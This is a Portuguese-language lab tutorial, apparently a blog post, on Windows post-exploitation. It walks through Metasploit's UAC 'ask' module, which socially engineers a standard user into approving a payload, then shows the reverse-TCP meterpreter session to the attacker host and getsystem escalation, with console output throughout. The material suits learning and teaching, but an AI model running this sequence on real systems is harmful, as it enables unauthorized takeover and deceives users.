Suponha que invadiu um computador, onde reparou que o usuário que estava logado, era um usuário comum ou seja não era administrador do sistema. Talvez realizou várias tentativas de ataques procurando paths vulneráveis a escalação de privilégios porém sem sucesso.
Em ultimo caso, se não houver nenhuma vulnerabilidades de escalação de privilégios, é obter o privilegio de sistema interagindo com o usuário. Em tecnologia esta técnica é chamada de engenharia social. Onde iremos enviar uma requisição via UAC para o usuario, caso recebermos a resposta com as informações necessárias, conseguiremos o usuário administrator e com isso será bem fácil obter privilegio de sistema.
Abaixo vou estar demonstrando e explicando sobre cada passo realizado.
É importante ressaltar que para seguir os passos citados abaixo, você já deve ter o acesso da máquina e está com a sessão do meterpreter em aberto, pois este lab é baseado em pós-exploração.
![]() |
orientaçãoemtecnologia.com |
- 1º passo: usar o exploit de ask para solicitar a senha adminitrativa via UAC ao usuario "use exploit/windows/local/ask".
- 2º passo: Realizar configurações de sessões, host local e porta local. No meu caso configurei na sessão 5, pois o meterpreter está na sessão 5. configurei o lhost no ip do meu kali e configurei a porta 10 para a escuta.
- 3º passo: Após configurações e set, digite o comando exploit para iniciar o processo de exploração com UAC.
- 4º passo: Após receber a sessão do meterpreter, digite getsystem para obter o privilégio de sistema.
windows privilege escalation
msf exploit(windows/local/ask) > sessions 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: WIN-MPA05BP9C25\usuario comum
meterpreter >
msf exploit(windows/local/ask) > sessions -l
[*] Starting interaction with 5...
meterpreter > getuid
Server username: WIN-MPA05BP9C25\usuario comum
meterpreter >
msf exploit(windows/local/ask) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 meterpreter x86/windows WIN-MPA05BP9C25\usuario comum @ WIN-MPA05BP9C25 192.168.190.134:2 -> 192.168.190.128:49511 (192.168.190.128)
msf exploit(windows/local/ask) > use exploit/windows/local/ask
msf exploit(windows/local/ask) > show options
Module options (exploit/windows/local/ask):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION 2 yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.190.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf exploit(windows/local/ask) > set session 5
session => 5
msf exploit(windows/local/ask) > set lport 10
lport => 10
msf exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.190.134:10
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading gHuEgWSBCBok.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (179779 bytes) to 192.168.190.128
[*] Meterpreter session 6 opened (192.168.190.134:10 -> 192.168.190.128:49599) at 2020-01-31 23:46:06 -0200
meterpreter >
meterpreter > getuid
Server username: WIN-MPA05BP9C25\Administrador
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: AUTORIDADE NT\SISTEMA
meterpreter >
[*] Started reverse TCP handler on 192.168.190.134:10
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading gHuEgWSBCBok.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (179779 bytes) to 192.168.190.128
[*] Meterpreter session 6 opened (192.168.190.134:10 -> 192.168.190.128:49599) at 2020-01-31 23:46:06 -0200
meterpreter >
meterpreter > getuid
Server username: WIN-MPA05BP9C25\Administrador
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: AUTORIDADE NT\SISTEMA
meterpreter >